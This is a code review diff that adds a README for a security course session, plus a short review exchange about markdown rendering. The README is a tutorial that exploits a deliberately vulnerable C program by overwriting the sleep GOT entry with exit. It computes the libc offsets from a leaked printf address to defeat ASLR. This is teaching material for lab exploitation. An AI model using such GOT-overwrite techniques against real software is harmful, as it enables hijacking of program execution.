sessions/defense-mechanisms/README.md

```diff
@@ -0,0 +1,423 @@
+
+In this tutorial we will exploit a program that is similar to the `no-ret-control` challenge from a previous session:
+
+```C
+#include <stdio.h>
+#include <unistd.h>
+ 
+int main() {
+	int *addr;
+ 
+	printf("Here's a libc address: 0x%08x\n", printf);
+ 
+	printf("Give me and address to modify!\n");
+	scanf("%p", &addr);
+ 
+	printf("Give me a value!\n");
+	scanf("%u", addr);
+ 
+	sleep(10);
+ 
+	printf("Abandon all hope ye who reach this...\n");	
+}
+```
+
+The goal is to alter the execution flow and avoid reaching the final `printf`. To this end, we will overwrite the `sleep` entry in GOT and redirect it to `exit`. However, due to ASLR, the value can not be hardcoded and must be computed at runtime. 
+
+Whenever we operate with addresses belonging to shared libraries, we must be aware that the offsets are highly dependent on the particular build of the library. We can identify this build either by its BuildID (retrieved with the file command), or by its version string:
+
+```bash
+silvia@imladris:/sss/demo$ ldd ./got_overwrite
+    linux-gate.so.1 (0xf7ee8000)
+    libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7ccc000)
+    /lib/ld-linux.so.2 (0xf7ee9000)
+silvia@imladris:/sss/demo$ file $(realpath /lib/i386-linux-gnu/libc.so.6)
+/lib/i386-linux-gnu/libc-2.27.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (GNU/Linux), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=cf1599aa8b3cb35f79dcaea7a8b48704ecf42a19, for GNU/Linux 3.2.0, stripped
+silvia@imladris:/sss/demo$ strings /lib/i386-linux-gnu/libc.so.6 | grep "GLIBC "
+GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.2) stable release version 2.27.
+```
+
+Alternatively, if we don't have prior knowledge of the remote system where the binary runs, but obtain via an information leak some addresses, we may be able to identify the libc based on the last 3 nibbles of these addresses:
+
+```bash
+0xf7df6250 <__libc_system>
+0xf7e780e0 <__sleep>
+```
+
+We enter them in the [libc database](https://libc.blukat.me/) and get a match for the same `libc` build we determined earlier. 
+
+For this `libc`, we obtain the offsets of the functions we are interested in using GDB:
+
+```bash
+silvia@imladris:/sss/demo$ gdb -q -n /lib/i386-linux-gnu/libc.so.6
+(gdb) p printf
+$1 = {<text variable, no debug info>} 0x513a0 <__printf>
+(gdb) p exit
+$2 = {<text variable, no debug info>} 0x30420 <__GI_exit>
+```
+
+We will also need the address of `sleep@got` (which is static because the binary is not position independent):
+
+```bash
+silvia@imladris:/sss/demo$ objdump -d -M intel -j .plt ./got_overwrite | grep "sleep@plt" -A1
+080483b0 <sleep@plt>:
+ 80483b0:   ff 25 0c a0 04 08       jmp    DWORD PTR ds:0x804a00c
+```
+
+We start the program and compute the address of exit based on the leak of printf (in another terminal):
+
+```bash
+>>> printf_offset = 0x513a0
+>>> exit_offset = 0x30420
+>>> 0xf7dfb3a0 - printf_offset + exit_offset
+4158497824
+```
+
+```bash
```

Comment:
The `'` on line 306 messes up the rich text look of this code section. Remove the `bash` specifier and it should be fine.

Reply:
Some flavors of markdown support custom code highlighting. But it might be better to remove it anyway in the case of github-markdown.